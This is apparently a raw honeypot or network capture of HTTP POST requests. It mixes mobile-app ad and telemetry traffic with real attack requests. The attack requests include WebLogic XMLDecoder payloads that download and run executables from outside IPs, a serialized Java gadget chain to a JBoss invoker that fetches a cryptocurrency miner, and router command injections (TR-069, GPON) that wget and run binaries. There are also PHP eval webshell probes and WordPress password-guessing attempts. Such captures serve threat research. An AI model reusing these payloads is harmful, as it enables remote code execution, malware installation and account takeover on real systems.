leng=die('Hello, Peppa!'.(string)(111111111*9));
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 325
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.26666668,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1495362169077,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149613607773&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 768
Host: cm.adkmob.com
Connection: Keep-Alive
Äë,_—úãd®3OÎ¥î(µ·K'7KÎô»á5ɶ¯i∏m[9ÃU`fl˛8≈™‡º∏Â~*øoM-∂ñÑ‘!+é˜S~¡≤«,[=>YŸ@Ï£@Aàvleíé`[ùPqÃD¢≤Á»◊ <4ObWò(ɛ嗶P\˜í‚"&Óœ{xõgB<|È-ÑRœÕ√Œ≤≈µãÒ“?˚MÎ÷¯™bØÆÛ ìaƒUÖaÚå#yÉs£øŒEÔé^ıÓ¥!z≥€ø:öµ®ø˙7á0.‰O∑M∆áE≤vÖ¿ëÖÈ£Oå˙≤hâc \"ç©≥‚MEùÁê:,cÕ≠|k&1&üÏΩdH{[3⁄q*aøœ``µd€s’EÈçñ˙f∂G˝≈?…4‹OHïáÕÓrÀπÿ‹sÀûb˘è3‘ƒ{ÑñkS’ËÄ»>ß’09ÿ}•=Û∫£j
]úhÁ ¨§ VΩfl≥ö«”€ñ∑gVF¡+˚+Ç˙c6≥u∏h˘%⁄“ZX˝≈/_⁄Â’°êB∑7@R1Û†/∂Â/_€—(æ∆˙Rˇb‹@ƒpDÆ~x†<fl˛í\™´Ds’2$ıÂ~; •í»_Ë˝=èSƒú≥>“!∞<®åÄ)–Q:x—0œ&Ç»OOñ“CÒ»-jуDÊ√|ˇÿ3hfl:ø;G¨Ÿ5l¿vºqˆÙáå◊O˘iæ—¥z@Ó–›z•o ù”ÚX?Æ(ú•´¡{=ıaè°‚‚π$˙ìâ¬ñO$ô¿»ˇ˛Æfl{íÓòF}ûÑ8¶˘z>WË∫í´r∆aßqÇL6Ôı≈ÓÙ-∏çEg√ë»4&Û…∂∏∆!u»k?‰Ï∑•øa4⁄<•Hdh`'™]Ñ˚s4«Ó¶Úìù≥â%uÒp‚¢k∑Á¶/Z[~U2§ Œ,'–PWoyÂÄ›0ú¥N◊Hc:Í6ø©éÊÀ*πœO\9‚•ôkj!â PÚÍB«è GÕGœìL€ñ
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
CFy3yXAVVgfWgC91sm3Ead8gQzm9HcT7SGkbBjcTvb0FtnX83jHVyyON6e5Hf1QXle4AJkzn2de5RN41N5witEU4XgK9P4BhiLydgOlSeoZZ0OOerdX9zqzQ0ntHUE/XhZzXTmwuo7MUxAbmH3FO/CIOQh6lFJgTqqrDTe4p71ey3tEG4DBIAo9GSmk4rAmOOo1fVsUdSydxCch7WYkkXaw8jF9KUXZYvAljksg+2Uc84PisTFkrkZTC1A3p1w9hxa20XQwXVY01WN9XkWZU67lobcTmR9oSj1RCY9FYgHKEianp97c985HgZEHSI8oPyO6AashgrgM9GK2znXvi6V5IUI0XnRz6saCYMwRlRr1PXKnnwgIbZLBzDBRn90MgO59oz3esKH0h2MUounU=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÖÖ§ŒÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl
POST /invoker/readonly HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{GxptΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~q~#sq~srjava.lang.Integer‚†§˜Åá8Ivaluexrjava.lang.Numberܨï î‡ãxpsrjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.Overridexpq~:
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=7654321
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
EKxWk9ieYlveNma5elfwVsqCBpPXMrwNkYz0AdXgmboWpxKMV2+uiuf3a72YUnHcyZu+3uCiH+OiM2HU8jv4C9vkLkJGQ6Ocv7VrACLseBuQjCpTF4r0D2IRYOIlnGBHbq5P2ELWRblydRiE3KWV9xi8M6upAYS9xSM4KxYx88JjL4NimOzlpyyc3cUHrnxlUi+19gFU4a/xzMBGLVtQNfs/HYRCRzlp4Cx5aICtioUVXUkqvE8/ZP98nYeJurv2FoLMYovJJnA6mIR4EqzNAz9eC4SC6GDi5J51Ah/7bHO5If+3op+lFyeASIlYDVTxNVYvoZdmSLGo9luPjJ/Jrq1MdL8RWW52Pw3YGVlVSd1oKwF4ZV30+/9FaxQc0jCDORLPTQRttDj+PiOpIGN1y2bnnZ7Pxg==
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496717505026
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2393
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
Bw22mXUXA4ZNHsUp4KG6fWZBhuyiwPMMIVwuh3pk8gPzeg7PFI/EPtOV2jE9fsIz0tk/DBYiU7WMfP1Cjs9yzmva00fjmn8i/aLNlU/LZ5/iwFIXFBwMssKtEKi5sub2TJ1qXE3TLEskQX1A+fpcznkLPfaA6BwpLWSNvGh52inn/HtvXMAQtB7MJYbOAQMkihynUSDw4/qyXeJC1zbzWtpSzoNvGt5Xxxr1LCkMydjPwEo7m0AcUjGG7w6F9zlhXsfzUa4d1/vSLn7hOg3Y6/dusgC14nPBo6RY3sffNuHIfYQW7GVbLX0Lou9BthIPgRI7KUQcxNfEdDZAM4yL563dqUPN/bXGrON0q4HzeLC+D2ndFUJV3Nty
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1031
Content-Type: multipart/form-data; boundary=lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
706169
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
754fa4f1e226c43b298238c2739d4278
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd--
POST /CGI/Execute HTTP/1.1
User-Agent: curl/7.35.0
Host: x.x.x.x
Accept: */*
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
XML=%3CCiscoIPPhoneExecute%3E%3CExecuteItem%20URL%3D%22Dial%3A00%22%20Priority%3D%220%22%20%2F%3E%3C%2FCiscoIPPhoneExecute%3E
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=456456
POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 78
Ns}›~ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpj@WTıÖƒ¶µy¥LRÖÕ_?⁄ÀhX{$∑ãÑç"–JÛ∑
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496391414215
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2493
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0
POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 215
◊ ™∏—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJE‰ßB‹ßejÅÓMúyíi∆Ÿ‰—:Æ·ó‚† (µ÷a(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú }JüHì›˛^&nc˘s ı짩^ª.≈9÷I ’Ÿ P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X™v≈õflˇD‡ßßz ◊¯)P0—Ú-ô]À?6
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=KJDF403KJ
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://cm.gcm.ksmobile.com/rpc/gcm/report HTTP/1.1
Charset: UTF-8
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cm.gcm.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 428
appflag=khcleanmaster&phonelanguage=in_ID&cmlanguage=in_ID&mcc=510&mnc=10&apkversion=5.14.2.4845&dataversion=2016.7.18.1648&sdkversion=4.4.4&manufacture=Xiaomi&channel=2010002546&trdmarket=1&cl=ID_in&aid=6ccc52a8048214f&timezone=Asia/Jakarta&country=ID&enabled=1&regid=APA91bGWRkNgry8cYyTFS3g5eIn45GwRPU2cMOutNLOJrtD0cDMgD-8kcgnif0oOZW-t9q0dLL3vE7GzHPq5J5vYHNKaQ67rDQ7Lzjmi1JJq5ZsNLMAOa-qBawNqE96V5Lk29ZQUmowh&regtime=1493631697
POST http://check.proxyradar.com/azenv.php?auth=152931069039&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
